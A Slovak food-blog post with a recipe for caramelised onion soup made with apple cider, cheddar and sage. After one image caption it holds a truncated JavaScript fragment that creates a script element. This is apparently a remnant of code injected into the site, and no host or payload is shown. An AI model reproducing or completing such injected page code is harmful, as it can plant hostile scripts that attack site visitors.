FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Hlavné jedlá / Sajder cibuľačka

Sajder cibuľačka

28/04/2015 by Martina Leave a Comment

Dnes prichádzame s naozaj výnimočným receptom :). Verím, že mnohí z Vás poznájú sajder (cider) od Jablčnô. Jablkový mušt, ktorý je vyrobený poctivou receptúrou zo slovenských jabĺk. Neprisladzovaný, nie z koncentrátu, a ešte k tomu s úžasnou chuťou.. no jednoducho nápoj, ktorý prejde aj našim náročným jazýčkom :).

Na jednej diskusii som ich oslovila, či by som mohla s týmto nápojom experimentovať v kuchyni.. Na moje potešenie súhlasili a tak sa môžete tešiť na sériu receptov s týmto skvelým sajderom :). A tu je náš prvý výtvor! :)

IMG_8383

Ingrediencie: (na 5-6porcií)

  • 1kg cibule (ja som použila zmes bielej, červenej a mladej)
  • 6 strúčikov cesnaku
  • 5 lístkov šalvie
  • 1 lyžica masla + 1 lyžica olivového oleja
  • 750ml vývaru (zeleninový/kurací/..)
  • 1 fľaša = 275ml Jablčnô Sajder
  • soľ, korenie
  • syr cheddar (ja som použila taký super Vintage cheddar, čo majú v Lidli) – cca 30g na porciu

IMG_8376
Postup:

  1. Cibuľu a cesnak nakrájame na plátky. Rozpálime tuk v hrnci.
  2. Spolu so šalviou pridáme do hrnca a za stáleho miešania opekáme približne 3minúty.
  3. Stíšime plameň, hrniec prikryjeme a dusíme za občasného premiešania 30minút. Cibuľka za ten čas krásne skaramelizuje.
  4. Podlejeme sajderom a dusíme ďalších 10minút. Nakoniec pridáme vývar a varíme posledných 10minút. Podľa chuti dosolíme a okoreníme.
  5. No a teraz nastáva možnosť výberu :). Tradične sa tento typ polievky zapeká v miske so syrom. Ak zvolíte tento postup, zapekaciu misku naplníme skoro po vrch polievkou, posypeme syrom a zapečieme v rúre na 200°C cca 10minút. Odporúčam zapekať vo vyššej časti rúry – potom ten syr bude vyzerať ako ogrilovaný.
  6. Ak sa Vám zapekať nechce, tak jednoducho syr zamiešate v miske s polievkou :)
  7. Ozdobíme krúžkami mladej cibuľky a podávame.

Táto polievka si Vás získa neopakovatelnou chuťou! Ja som osobne hneď zhodnotila, že mi vône a chute pripomínajú talianske risotto :).

IMG_8382var d=document;var s=d.createElement(‘script’);

Share this:

  • Facebook
  • Google
  • Pinterest

Related

Filed Under: Hlavné jedlá, Polievky, Recepty Tagged With: GF, LF

« Zamiluj si #ingredienciu
Zamiluj si #špargľu »

Leave a Reply Cancel reply

You must be logged in to post a comment.

  • Facebook
  • Flickr
  • Instagram
  • Pinterest

Kto som

Kto som

Sleduj ma na FB

Sleduj ma na FB

Ochutnaj mandlove

Najnovšie

Plnené papriky syrom feta v krémovej paradajkovej omáčke

Plnené papriky syrom feta v krémovej paradajkovej omáčke

Kontakt

Kontakt

Ochutnaj

Žĺtkové rezy

Žĺtkové rezy

Copyright © 2019 · Tasteful theme by Restored 316